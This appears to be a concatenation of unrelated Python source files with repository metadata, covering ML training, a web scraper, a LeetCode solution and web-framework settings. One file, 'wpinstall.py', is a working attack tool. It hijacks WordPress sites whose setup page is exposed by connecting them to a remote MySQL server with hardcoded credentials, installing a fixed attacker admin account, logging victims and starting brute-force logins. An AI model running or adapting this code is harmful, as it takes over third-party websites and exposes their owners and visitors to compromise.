return DataLoader(self.train_dataset, batch_size=self.batch_size, num_workers=1, drop_last=True)
def val_dataloader(self):
return DataLoader(self.valid_dataset, batch_size=self.batch_size, num_workers=1, drop_last=True)
def test_dataloader(self):
return DataLoader(self.test_dataset, batch_size=self.batch_size, num_workers=1)
checkpoint_callback = ModelCheckpoint(
monitor='val_loss',
dirpath='.',
filename='bert-ind-{epoch:02d}-{val_loss:.2f}',
save_top_k=10,
mode='min',
)
dm = Dm()
lm = My_lm()
# # debug
# trainer = pl.Trainer(gpus=1, overfit_batches=1)
# trainer = pl.Trainer(gpus=1, fast_dev_run=True)# , profiler='simple')
# trainer = pl.Trainer(gpus=1, max_epochs=1, callbacks=[checkpoint_callback])
# trainer = pl.Trainer(gpus=1, max_epochs=10, limit_train_batches=10, limit_val_batches=3, callbacks=[checkpoint_callback])
# standard train, validation and test
# trainer = pl.Trainer(gpus=1, max_epochs=50, callbacks=[checkpoint_callback])
# trainer.fit(lm,dm)
# result = trainer.test()
# # testing only
# # use larger batch size to speed up testing
dm.setup()
model = lm.load_from_checkpoint('legend/bert-ind-epoch=039-val_loss=0.40.ckpt')
trainer = pl.Trainer(gpus=1)
result = trainer.test(model, test_dataloaders=dm.test_dataloader())
|
[
"qpeisheng@gmail.com"
] |
qpeisheng@gmail.com
|
19102a19834c96bbcc0fad460eac549a8e9a3f99
|
495d05bf59a650da83119e3e796f1978fc0d5081
|
/第九章/9.3.py
|
b6ece6eb0e8895913ba67c7d3152770ac3094773
|
[] |
no_license
|
jaredchin/Core-Python-Programming
|
776e69764656cee8ffe3257dd953166a761099c1
|
a081560e78685634f29c89d109efd99b3100eb73
|
refs/heads/master
| 2021-09-10T17:56:50.288037
| 2018-03-30T15:09:04
| 2018-03-30T15:09:04
| 111,692,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 195
|
py
|
import os
fobj = open('test.txt', 'w')
while True:
aLine = input("Enter a line ('.' to quit): ")
if aLine != ".":
fobj.write('%s\n' % aLine)
else:
break
fobj.close()
|
[
"1007707989@qq.com"
] |
1007707989@qq.com
|
b1561a5a09375df8219b095e33b192ffafb03de1
|
eb755b42aa2ec9e6ab63001a6293d5e225837086
|
/Other_web_spider/Phantomjs/Phantomjs_id_location.py
|
f4b494cfe8dbfb44c591643255e8da05cbfcbc6d
|
[] |
no_license
|
paramedick/python-web-crawlers
|
7c493cbc51c4189d0dabaeae6cfba84123f7401d
|
5deea2073583bbb8d229c6404680e543ebcdbc5b
|
refs/heads/master
| 2022-01-19T21:25:29.058709
| 2019-08-13T14:43:22
| 2019-08-13T14:43:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
# coding=utf-8
from selenium import webdriver
browser = webdriver.Firefox()
browser.get("http://www.baidu.com/")
browser.find_element_by_id("kw").send_keys("python")
browser.implicitly_wait(60)
browser.quit()
|
[
"429095816@qq.com"
] |
429095816@qq.com
|
3aee936d5111a837b9237d8b38ceb76fc98be8fe
|
e44cf49719aa36ee4fc7314ca624cd37d04efc88
|
/442-find-all-duplicates-in-an-array.py
|
592d200f353d2ae15fb28e535a7312ad5f08e508
|
[] |
no_license
|
tiaotiao/leetcode
|
3115d8a64353aa236c25a6af266ee54bfab7d44b
|
88afef5388e308e6da5703b66e07324fb1723731
|
refs/heads/master
| 2020-05-21T13:47:20.264552
| 2018-09-19T22:52:28
| 2018-09-19T22:52:28
| 65,435,630
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
class Solution:
def findDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
res = []
for i in range(len(nums)):
idx = abs(nums[i]) - 1
if nums[idx] > 0:
nums[idx] = -nums[idx]
else:
res.append(idx + 1)
return res
def main():
s = Solution()
nums = [4,3,2,7,8,2,3,1]
print(s.findDuplicates(nums))
if __name__ == '__main__':
main()
|
[
"tiaotiaoyly@gmail.com"
] |
tiaotiaoyly@gmail.com
|
f39918fe446e14b7afba346efa267b6e087a3fe4
|
ad784ca84b36073cd6abc3c29b696ffc08d3851f
|
/practice2.py
|
018468b2acb9a777bfe9263503094aa8e2ef3441
|
[] |
no_license
|
YogeshwaranaPachiyappan/Python
|
356f0114e03cb017cc15e842815177fe3e18f1bb
|
01d7383c0691f57eb8640bad668c563998946671
|
refs/heads/master
| 2020-12-04T05:31:51.343612
| 2020-07-28T04:51:03
| 2020-07-28T04:51:03
| 231,633,361
| 0
| 0
| null | 2020-04-08T03:22:11
| 2020-01-03T17:23:04
|
Python
|
UTF-8
|
Python
| false
| false
| 59
|
py
|
s=input()
a=s.split()
print(len(a))
# The original line, print(a.upper(:1)), is a syntax error; printing the first
# word upper-cased is one plausible intent.
print(a[0].upper() if a else '')
|
[
"noreply@github.com"
] |
noreply@github.com
|
b3cdcb8ef497d5e18564d7b7f47262c537e111e3
|
b89ec2839b4a6bd4e2d774f64be9138f4b71a97e
|
/dataent/website/doctype/website_settings/website_settings.py
|
4fc4412d550622749995427444bce0dbc835241c
|
[
"MIT"
] |
permissive
|
dataent/dataent
|
ec0e9a21d864bc0f7413ea39670584109c971855
|
c41bd5942ffe5513f4d921c4c0595c84bbc422b4
|
refs/heads/master
| 2022-12-14T08:33:48.008587
| 2019-07-09T18:49:21
| 2019-07-09T18:49:21
| 195,729,981
| 0
| 0
|
MIT
| 2022-12-09T17:23:49
| 2019-07-08T03:26:28
|
Python
|
UTF-8
|
Python
| false
| false
| 4,869
|
py
|
# Copyright (c) 2015, Dataent Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import dataent
from dataent import _
from dataent.utils import get_request_site_address, encode
from dataent.model.document import Document
from six.moves.urllib.parse import quote
from dataent.website.router import resolve_route
from dataent.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
def validate(self):
self.validate_top_bar_items()
self.validate_footer_items()
self.validate_home_page()
def validate_home_page(self):
if dataent.flags.in_install:
return
if self.home_page and not resolve_route(self.home_page):
dataent.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
self.home_page = ''
def validate_top_bar_items(self):
"""validate url in top bar items"""
for top_bar_item in self.get("top_bar_items"):
if top_bar_item.parent_label:
parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
if not parent_label_item:
# invalid item
dataent.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
dataent.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
top_bar_item.idx))
def validate_footer_items(self):
"""validate url in top bar items"""
for footer_item in self.get("footer_items"):
if footer_item.parent_label:
parent_label_item = self.get("footer_items", {"label": footer_item.parent_label})
if not parent_label_item:
# invalid item
dataent.throw(_("{0} does not exist in row {1}").format(footer_item.parent_label, footer_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
dataent.throw(_("{0} in row {1} cannot have both URL and child items").format(footer_item.parent_label,
footer_item.idx))
def on_update(self):
self.clear_cache()
def clear_cache(self):
# make js and css
# clear web cache (for menus!)
dataent.clear_cache(user = 'Guest')
from dataent.website.render import clear_cache
clear_cache()
# clears role based home pages
dataent.clear_cache()
def get_website_settings():
hooks = dataent.get_hooks()
context = dataent._dict({
'top_bar_items': get_items('top_bar_items'),
'footer_items': get_items('footer_items'),
"post_login": [
{"label": _("My Account"), "url": "/me"},
# {"class": "divider"},
{"label": _("Logout"), "url": "/?cmd=web_logout"}
]
})
settings = dataent.get_single("Website Settings")
for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
"facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup", "hide_footer_signup", "head_html", "title_prefix",
"navbar_search"]:
if hasattr(settings, k):
context[k] = settings.get(k)
if settings.address:
context["footer_address"] = settings.address
for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup"]:
context[k] = int(context.get(k) or 0)
if dataent.request:
context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
context.encoded_title = quote(encode(context.title or ""), str(""))
for update_website_context in hooks.update_website_context or []:
dataent.get_attr(update_website_context)(context)
context.web_include_js = hooks.web_include_js or []
context.web_include_css = hooks.web_include_css or []
via_hooks = dataent.get_hooks("website_context")
for key in via_hooks:
context[key] = via_hooks[key]
if key not in ("top_bar_items", "footer_items", "post_login") \
and isinstance(context[key], (list, tuple)):
context[key] = context[key][-1]
add_website_theme(context)
if not context.get("favicon"):
context["favicon"] = "/assets/dataent/images/favicon.png"
if settings.favicon and settings.favicon != "attach_files:":
context["favicon"] = settings.favicon
return context
def get_items(parentfield):
all_top_items = dataent.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield= %s
order by idx asc""", parentfield, as_dict=1)
top_items = [d for d in all_top_items if not d['parent_label']]
# attach child items to top bar
for d in all_top_items:
if d['parent_label']:
for t in top_items:
if t['label']==d['parent_label']:
if not 'child_items' in t:
t['child_items'] = []
t['child_items'].append(d)
break
return top_items
@dataent.whitelist(allow_guest=True)
def is_chat_enabled():
return bool(dataent.db.get_single_value('Website Settings', 'chat_enable'))
|
[
"38303879+dataent@users.noreply.github.com"
] |
38303879+dataent@users.noreply.github.com
|
e39ec3b82e0551f31532345f993df0e4da0ee93f
|
459185e0e12d486e91fcfff3e6d6174afbdf70db
|
/JEX-V4/Exploits/wpinstall.py
|
84eb5f88c61670e0b117e32045f691f557ac28bc
|
[] |
no_license
|
Hdiaktoros/laravel-dorks
|
e42a1be938b0fdbbf17e6689d50c7f8bcf30c464
|
a9ae0af4a27b522f939b5c1627db3b98f18bb5c3
|
refs/heads/main
| 2023-07-05T02:59:17.032717
| 2021-08-21T16:30:42
| 2021-08-21T16:30:42
| 398,522,099
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,456
|
py
|
# coding=utf-8
from Exploits import printModule
import requests
from random import sample
from BruteForce import Wordpress
# ----------------==---- MY USER AGent ----==----------------
Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0'}
# -------------------- MYSQl SERVER INFO --------------------
HOST = '31.210.78.238'
USER = 'francesco_res'
PASS = 'L30zDTZDTP'[::-1]
DB = 'francesco_reservex'
# ----------------==---- WpInstall Info ----==----------------
username = 'u1337'
password = 'uAdmin@123'
# ------------------------------------------------------------
def RandomGenerator(lenth):
return ''.join(sample('abcdefghijklmnopqrstuvwxyz', lenth))
def WpInstall(site, Email):
session = requests.Session()
RandomStringForPREFIX = str('wp_' + str(RandomGenerator(8)) + '_')
try:
DATA = {
'dbname': DB,
'uname': USER,
'pwd': PASS,
'dbhost': HOST,
'prefix': RandomStringForPREFIX,
'language': 'en_US',
'submit': 'Submit'
}
A = session.post('http://' + site + '/wp-admin/setup-config.php?step=2', data=DATA, headers=Headers, timeout=10)
if 'install.php' in str(A.content):
POSTDATA_Install = {
'weblog_title': 'installed|jex',
'user_name': username,
'admin_password': password,
'pass1-text': password,
'admin_password2': password,
'pw_weak': 'on',
'admin_email': Email,
'Submit': 'Install+WordPress',
'language': 'en_US'
}
session.post('http://' + site + '/wp-admin/install.php?step=2', data=POSTDATA_Install,
headers=Headers, timeout=25)
except:
pass
try:
source = session.get('http://' + site + '/wp-login.php', timeout=10, headers=Headers).content
if 'installed|jex' in str(source):
with open('result/Wp-Installed.txt', 'a') as writer:
writer.write(site + '/wp-login.php\n Username: {}\n'
' Password: {}\n------------------------------------------\n'
.format(username, password))
Login = Wordpress.Wordpress()
Login.BruteForce(site, password, username)
return printModule.returnYes(site, 'N/A', 'Wp-Install', 'Wordpress')
else:
with open('result/Wp-SetupFound.txt', 'a') as writer:
writer.write('{}/wp-admin/setup-config.php\n'.format(site))
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
except:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
def Check(site, email):
try:
PATHz = [
'',
'/wordpress',
'/wp',
'/blog',
'/test',
'/site'
]
x = 0
for path in PATHz:
C = requests.get('http://' + site + path + '/wp-admin/setup-config.php?step=0')
if 'setup-config.php?step=1' in str(C.content):
x += 1
return WpInstall(site + path, email)
if x == 0:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
except:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
|
[
"frimpongasante50@gmail.com"
] |
frimpongasante50@gmail.com
|
30a66d64f31cafc94958091c752359386e6a4311
|
224bbfdc32d0863f2c01dc8df5d22f99d8ba8a59
|
/Django-Angular-Ionic-Env/Scripts/django-admin.py
|
c1c7b58459de83af3b060986cd7ea54a45f133fb
|
[
"MIT"
] |
permissive
|
ricardoBento/Django-Angular-Ionic
|
f070d4a43e0a8fd5a99aeb55976f17a4937bf081
|
fea23986deb613603a150d11787b609971c7152f
|
refs/heads/master
| 2022-11-10T02:46:17.808929
| 2020-06-29T13:21:37
| 2020-06-29T13:21:37
| 269,649,736
| 0
| 0
|
MIT
| 2020-06-05T13:41:41
| 2020-06-05T13:41:39
| null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
#!c:\users\rbento\documents\github\django-angular-ionic\django-angular-ionic-env\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
[
"ricardo@flowhospitalitytraining.co.uk"
] |
ricardo@flowhospitalitytraining.co.uk
|
249c8be8faca60c67ed1827c6122bee07e1fa8ac
|
a5a4cee972e487512275c34f308251e6cc38c2fa
|
/tests_old/tests_openmpi/test_hello_world/test_hello_world.py
|
b5a6b03915a4a452b63bb6efdf8838d172ecddf7
|
[
"MIT"
] |
permissive
|
eragasa/pypospack
|
4f54983b33dcd2dce5b602bc243ea8ef22fee86b
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
refs/heads/master
| 2021-06-16T09:24:11.633693
| 2019-12-06T16:54:02
| 2019-12-06T16:54:02
| 99,282,824
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 706
|
py
|
from subprocess import call
import os
# possibly the greatest hack of a test to ever be written
def test_hello_world():
call(["sbatch", "runjob_hipergator.sh"])
while True:
r0 = os.path.exists("rank_0")
r1 = os.path.exists("rank_1")
r2 = os.path.exists("rank_2")
r3 = os.path.exists("rank_3")
err = os.path.exists("job.err")
if all([r0, r1, r2, r3]):
os.remove("rank_0")
os.remove("rank_1")
os.remove("rank_2")
os.remove("rank_3")
assert True
return
if err:
os.remove("job.err")
os.remove("job.out")
assert False
return
|
[
"seatonullberg@gmail.com"
] |
seatonullberg@gmail.com
|
2752c83cd011675845e421f06b6105a534c335c1
|
0b490626a19dae9d2b9da68cebad27ee43c3dec5
|
/python/seqdiff/__main__.py
|
3b756498b413ec01837a11212d0b346101f4a8cd
|
[
"Apache-2.0"
] |
permissive
|
tamuhey/seqdiff
|
1c8e4bb8bafaad069472282835a245a7d2b94ffa
|
4bd79979fbce25989d55644d6e3ca2efbc15edd8
|
refs/heads/master
| 2023-06-15T19:23:41.763124
| 2021-07-13T05:08:16
| 2021-07-13T05:08:16
| 273,475,966
| 5
| 0
| null | 2021-07-13T05:07:25
| 2020-06-19T11:19:56
|
Rust
|
UTF-8
|
Python
| false
| false
| 96
|
py
|
from seqdiff import print_diff
if __name__ == "__main__":
print_diff([1, 2, 3], [1, 3, 4])
|
[
"tamuhey@gmail.com"
] |
tamuhey@gmail.com
|
e843bc323ab895070d72d3d47f9812b5ecceddc9
|
120e2282a264a784a1fa3897f86ed5c318035b0c
|
/single_agent_game_20x10/constant.py
|
fec2348f3ae5f699530ab662d50a3c770f15a67e
|
[] |
no_license
|
macwiatrak/CPR_game_RL
|
5ac1021f4d9d03ba9978964c06e23def28d19d8b
|
297140bfc624f0fd84a7150fdb00aad9a904d7b2
|
refs/heads/master
| 2020-04-16T04:24:50.034200
| 2019-03-27T01:54:30
| 2019-03-27T01:54:30
| 165,266,095
| 0
| 0
| null | 2019-03-27T01:54:31
| 2019-01-11T15:32:27
|
Python
|
UTF-8
|
Python
| false
| false
| 694
|
py
|
foodList = [(2,0), (2,1), (2,2), (1,1), (7,0), (7,1), (7,2),(6,1), (3,1), (8,1), (12,0), (12,1),
(12,2), (11,1), (13,1), (17,0), (17,1), (17,2), (16,1), (18,1), (4,9),
(3,8), (4,8), (4,7), (5,8), (9,9), (9,8), (9,7), (8,8), (10,8), (14,9), (14,8), (14,7),
(13,8), (15,8), (19,9), (19,8), (19,7), (18,8)]
foodList_1 = [(2,0), (2,1), (2,2), (1,1), (7,0), (7,1), (7,2),(6,1), (3,1), (8,1), (12,0), (12,1),
(12,2), (11,1), (13,1), (17,0), (17,1), (17,2), (16,1), (18,1), (4,9),
(3,8), (4,8), (4,7), (5,8), (9,9), (9,8), (9,7), (8,8), (10,8), (14,9), (14,8), (14,7),
(13,8), (15,8), (19,9), (19,8), (19,7), (18,8)]
|
[
"maciej.wiatrak.16@ucl.ac.uk"
] |
maciej.wiatrak.16@ucl.ac.uk
|
df9e7c03601392167c361181c786ab8f9bbea75f
|
9a0b070f3f3501c6ac49b77008af6386ba6876a4
|
/2021/Oct/1012/4012_요리사/s1.py
|
1790bfaecded6f96b64791633700289227062390
|
[
"MIT"
] |
permissive
|
Jin-RHC/daily_algo
|
9f865e1733748465d069f8b484ed061e61fd7f40
|
7985a69bf62621ef88319a035af00b52831fc105
|
refs/heads/main
| 2023-08-26T00:10:21.128812
| 2021-10-25T16:14:26
| 2021-10-25T16:14:26
| 415,309,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 605
|
py
|
import sys
sys.stdin = open('input.txt')
from itertools import combinations
T = int(input())
for tc in range(1, T + 1):
N = int(input())
lst = [list(map(int, input().split())) for _ in range(N)]
target = N // 2
comb = combinations(range(N), target)
answer = 100000000000000
for i in comb:
temp_set = set(range(N)) - set(i)
temp_a = sum([lst[r][c] for r in i for c in i])
temp_b = sum([lst[r][c] for r in temp_set for c in temp_set])
if abs(temp_a - temp_b) < answer:
answer = abs(temp_a - temp_b)
print('#{} {}'.format(tc, answer))
|
[
"gksrnrdmlsk@gmail.com"
] |
gksrnrdmlsk@gmail.com
|
7ac53b30a3b57016edf0f73d53b71a70649b08bc
|
410a0fac2282d867aa7e531c40c7289e4484510c
|
/venv/bin/django-admin.py
|
61ab7e2731c49b3611f2427a7932908cf764ede8
|
[] |
no_license
|
NickVazovsky/parser_go
|
922a46ecca1c3def1adcfe3e029c82641247804b
|
a8dc3c082d246e4325d13e7ef1863df7238694cc
|
refs/heads/master
| 2020-07-29T12:50:55.579542
| 2019-09-20T14:31:02
| 2019-09-20T14:31:02
| 209,806,760
| 0
| 0
| null | 2019-09-20T14:26:48
| 2019-09-20T14:13:45
|
Python
|
UTF-8
|
Python
| false
| false
| 164
|
py
|
#!/home/nick/PycharmProjects/new_project/venv/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
[
"nvazovsky@gmail.com"
] |
nvazovsky@gmail.com
|
6c6313683fedb59ebf2b417b4e225337fbb854d1
|
42550b48b3fbb23f2ea95183eddbe29d23370db9
|
/3. Control Flow/2_perulangan.py
|
93f0123c91804b41c5294bb0f0dcd266641d16c8
|
[] |
no_license
|
all4yandaru/Python
|
ad4beafe1e83591c6383dae149f29f492e8e1015
|
b47c66f37c3e9cd35c28942eac64efdb53abe70f
|
refs/heads/master
| 2023-04-26T05:05:55.472699
| 2021-05-27T03:00:59
| 2021-05-27T03:00:59
| 371,228,665
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
# for
for huruf in "Dicoding":
print("Huruf {}".format(huruf))
print("=========")
flowers = ['mawar', 'melati', 'anggrek']
for bunga in flowers:
print("flower : {}".format(bunga))
print("=========")
for index in range(len(flowers)):
print('Flowers [{}]: {}'.format(index, flowers[index]))
for i in range(3, 1, -1):  # from 3 down to 2, step -1
print(i)
for i in range(5, -1, -1):
for j in range(i):
print("*", end="")
print()
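# The nested loops above print a right triangle of '*' that shrinks from five stars
# down to an empty line, one row per value of i (5, 4, 3, 2, 1, 0).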
# while
count = 0
while count < 7:
print('Hitungannya adalah: {}'.format(count))
count += 2
|
[
"all4yandaru@gmail.com"
] |
all4yandaru@gmail.com
|
bbb3f58b7effacb2400ce12ff121834858bb00af
|
5ff85cb7c0f447b6cd35bd521fde6b0e3fe76443
|
/webcopy1.py
|
1f140b91561f65d4049380294bef59a520cd2eba
|
[] |
no_license
|
priyanshusankhala/Research-paper
|
17d9e72cca31439818631f236d37c9f29319f71e
|
a97bec6239abd8acef6cc8fbbae23706b082b993
|
refs/heads/main
| 2023-07-15T21:02:27.533836
| 2021-08-27T10:21:32
| 2021-08-27T10:21:32
| 366,608,391
| 0
| 0
| null | 2021-05-12T06:08:25
| 2021-05-12T05:59:03
| null |
UTF-8
|
Python
| false
| false
| 12,205
|
py
|
import urllib
import json as m_json
from urllib import request
from urllib.parse import urlparse
import sys
import enchant
from numpy import array
from requests_html import HTMLSession
from collections import Counter
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from urllib.request import urlopen
import numpy as np
from selenium import webdriver
import ssl
import requests
# ''' This code crawls the web to create features for an ML model.
# Import the libraries above and then run the class called FeatureCreation.
# FeatureCreation computes each feature from the crawled data and stores the
# extracted values in a list called features.
# '''
class FeatureCreation:
def __init__(self):
# self.url = url
        # ''' q stands for the query, which is the name of the company; we store
        # it in self.c_name to be used wherever the company name is required
# '''
q =[]
q = 'abbott'
self.c_name = q
def getURLForQuery(self):
        # ''' This function crawls the web to fetch the url, title and meta contents.
        # It uses the Selenium web crawler; in case it stops working, check whether the
        # containers referenced in find_element_by_xpath have changed.
        # title stores the title contents
        # link stores the link contents
        # detail stores the meta contents
        # driver.close() closes the Selenium web crawler
        # '''
# q = self.c_name
# driver = webdriver.Chrome()
# driver.get('https://www.google.com/search?q='+q)
# title = driver.find_element_by_xpath('//div[@class="g"]').find_element_by_xpath('.//h3').text
# link = driver.find_element_by_xpath('//div[@class="g"]').find_element_by_xpath('.//div[@class ="yuRUbf"]/a').get_attribute('href')
# detail = driver.find_element_by_xpath('//div[@class="g"]').find_element_by_xpath('.//div[@class="VwiC3b yXK7lf MUxGbd yDYNvb lyLwlc"]')
# self.title = title
# self.url = link
# self.meta = detail.text
# driver.close()
# print(self.title, self.url)
# return[self.title, self.url, self.meta]
arr1 = []
arr2 = []
arr3 = []
q =[]
q = self.c_name
driver = webdriver.Chrome()
driver.get('https://www.google.com/search?q='+q+'%20WEBSITE&num=4') #+'%20WEBSITE&num=4'
for element in driver.find_elements_by_xpath('//div[@class="g"]'):
##title = element.find_element_by_xpath('.//h3').find_element_by_xpath('.//h3[@class = "LC20lb DKV0Md"]').text
title = element.find_element_by_xpath('.//h3[@class = "LC20lb DKV0Md"]').text
link = element.find_element_by_xpath('.//div[@class ="yuRUbf"]/a').get_attribute('href')
# link = element.find_element_by_xpath('.//div[@class ="yuRUbf"]').find_element_by_xpath('.//div[@class = "TbwUpd NJjxre"]').text
##.find_element_by_xpath('.//cite[@class = "iUh30 Zu0yb qLRx3b tjvcx"]')
##detail = element.find_element_by_xpath('.//div[@class="VwiC3b yXK7lf MUxGbd yDYNvb lyLwlc"]').text
detail = element.find_element_by_xpath('.//div[@class="IsZvec"]').text
#print(detail)
#print(link)
# print(title)
arr1.append(title)
arr2.append(link)
arr3.append(detail)
arr2 = list(filter(None, arr2))
arr1 = list(filter(None, arr1))
arr3 = list(filter(None, arr3))
self.title = arr1
self.url = arr2
self.meta = arr3
#print(arr1, arr2, arr3) # Test
#return self.title
return[self.meta,self.url, self.title]
# driver.close()
# def getURLForQuery(q):
# URLS = []
# for result in q:
# title = result['title']
# meta = result['meta']
# url = result['url'] # was URL in the original and that threw a name error exception
# URLS.append(url)
# return title
# return meta
# return url
# def getURLForQuery(q, query2URLS):
# # query = urllib3.urlencode ( { 'q' : q } )
# # response = urllib3.urlopen ( 'http://googleapis.com/ajax/services/search/web?v=1.0&' + query ).read()
# # json = m_json.loads ( response )
# results = json [ 'responseData' ] [ 'results' ]
# URLS = []
# for result in results:
# title = result['title']
# meta = result['meta']
# url = result['url'] # was URL in the original and that threw a name error exception
# URLS.append(url)
# return title
# return meta
# return url
# query2URLS[q] = URLS
# def getRankedURLSLst(urls):
# # store the rank of each url
# rankedURLSDict = {}
# min_url_rank = sys.maxint
# max_url_rank = -sys.maxint
# for i, url in enumerate(urls):
# return sorted([(k, float(rankedURLSDict[k] - min_url_rank)
def appeared_in_title(self):
        # '''This function counts the number of times the company name appears in the title tag of the url.
        # We store the title retrieved from the web in string and the query in substring,
        # then lowercase both to count the appearance.
        # '''
arr = []
string = self.title
substring = self.c_name
for i in string:
res = i.lower().count(substring.lower())
arr.append(res)
#self.count
self.count = arr
#print(self.count) # Test
return self.count
def appeared_in_meta(self):
        # '''This function counts the number of times the company name appears in the meta tag of the url.
        # '''
arr = []
string1 = self.meta
substring1 = self.c_name
for i in string1:
res1 = i.lower().count(substring1.lower())
arr.append(res1)
self.count1 = arr
#print(self.count1) # Test
return self.count1
def title_normalized(self):
arr = []
        # ''' This function divides the appeared-in-title count by the number of words in the company name.
        # We split the company name to count the number of words in it and then
        # divide the title count by that number.
        # '''
a_string = self.c_name
word_list = a_string.split()
#Split `a_string` by whitespace
number_of_words = len(word_list)
for i in self.count:
Count = i
TN = Count/number_of_words
arr.append(TN)
#print(arr) #Test
TN = arr
return TN
def meta_normalized(self):
        # ''' This function divides the appeared-in-meta count by the number of words in the company name.
        # We split the company name to count the number of words in it and then
        # divide the meta count by that number.
        # '''
arr = []
a_string = self.c_name
word_list = a_string.split()
#Split `a_string` by whitespace
number_of_words = len(word_list)
#Count = appeared_in_meta(count1)
for i in self.count1:
Count = i
MN = Count/number_of_words
arr.append(MN)
#print(arr) #Test
MN = arr
return MN
    def lvtn(self):
        # ''' Levenshtein distance between each result title and the company name,
        # computed with the enchant library (mirrors lvdn below).
        # '''
        arr = []
for i in self.title:
s1 = i
s2 = self.c_name
arr.append(enchant.utils.levenshtein(s1, s2))
#print(arr) #Test
return arr
def lvdn(self):
# ''' To obtain the levenshtein distance between domain and query submitted
# it uses enchant library
# '''
#s11 = getURLForQuery(url)
arr1 = []
for i in self.url:
s11 = i
s22 = self.c_name
arr1.append(enchant.utils.levenshtein(s11, s22))
#print(arr1) # Test
return arr1
def no_of_links(self):
arr = []
session = HTMLSession()
for i in self.url:
try:
r = session.get(i,verify=False) # "http://www.abbott.com"
unique_netlocs = Counter(urlparse(link).netloc for link in r.html.absolute_links)
summ = 0
for link in unique_netlocs:
try:
summ += unique_netlocs[link]#print(link, unique_netlocs[link]
except Exception as e:
summ =0
arr.append(summ)
except requests.exceptions.ProxyError:
arr.append(0)
self.summ = arr
#print(self.summ) #Test
return self.summ
#print(arr)
def word_count(self):
# ''' To obtain the total word count in html of a link
# '''
arr = []
for i in self.url:
url = i #"https://aig.com"
context = ssl._create_unverified_context()
#urllib.urlopen("https://no-valid-cert", context=context)
try:
html = urlopen(url, context=context)
soup = BeautifulSoup(html, "html.parser")
type(soup)
all_links = soup.findAll('html')
str_cells = str(all_links)
cleartext = BeautifulSoup(str_cells, "html.parser").get_text()
#print(cleartext)
a_string = cleartext
word_list = a_string.split()
no_of_words = len(word_list)
arr.append(no_of_words)
except urllib.error.HTTPError as e:
#print('0')
arr.append(0)
self.no_of_words = arr
#print(self.no_of_words)#Test
return self.no_of_words
#print(arr)
#return self.no_of_words
def ratio_word_link(self):
no_of_words = self.no_of_words
summ = self.summ
c=[x / y if y else 0 for x, y in zip(no_of_words, summ)]
#print(str(c)) # Test
return c
def cname_in_html(self):
arr =[]
l1 = self.count # float(input("appeared in title "))
l2 = self.count1 #float(input("appeared in meta: "))
for x, y in zip(l1, l2):
if x<=0 and y<=0:
#print(0)
v = 0
#return False
else:
#print(1)
v = 1
arr.append(v)
#print(arr) #Test
return arr
def rank_of_page(self):
names = self.url
numbers = []
num =1
for item in range(len(names)):
if item == len(names) - 1:
break
elif names[item] == names[item+1]:
numbers.append(num)
else:
numbers.append(num)
num = num + 1
numbers.append(num)
return numbers
#print(numbers) # Test
def feature_extract(self):
arr= []
geturl = self.getURLForQuery()
Title = self.appeared_in_title()
TN = self.title_normalized()
Meta = self.appeared_in_meta()
MN = self.meta_normalized()
LVTN = self.lvtn()
LVDN = self.lvdn()
Links = self.no_of_links()
Word = self.word_count()
DCNAIH = self.cname_in_html()
RatioWL = self.ratio_word_link()
ROP = self.rank_of_page()
#v = [ROP, Title, TN, Meta, MN, LVTN, LVDN, Links, Word, DCNAIH, RatioWL]
#mapped = zip(ROP, Title, TN, Meta, MN, LVTN, LVDN, Links, Word, DCNAIH, RatioWL)
#mapped = set(mapped)
#print(mapped)
for v in zip(ROP, Title, TN, Meta, MN, LVTN, LVDN, Links, Word, DCNAIH, RatioWL):
# print([v])
#res = [ v[i] for i in () ]
#res = v[::]
#print(str(res))
#mat1 = np.array(v)
#print(mat1)
#print(mat1[[0]])
#print(v)
arr.append(v)
self.v = arr
return self.v
def get_url(self):
#geturl = self.getURLForQuery()
z = self.url
#print(z)
return z
#return geturl[1]
peag = FeatureCreation()
features = peag.feature_extract()
displayurl = peag.get_url()
|
[
"noreply@github.com"
] |
noreply@github.com
|
cb5db349433375952b79438f4586f8e8eb237a43
|
e9ff9715adbf6ed11d5073c966ae9ab586ff5942
|
/Desktop/code/app.py
|
0f596818aba02088fa0db725d761289e00b9b84b
|
[] |
no_license
|
nischal-sudo/Flask-repo
|
f6dd42234f39dd524fab9f8955002b89e6b27bc9
|
c50ceb7b118935e9eb7e82e66f216b5b1066f41f
|
refs/heads/master
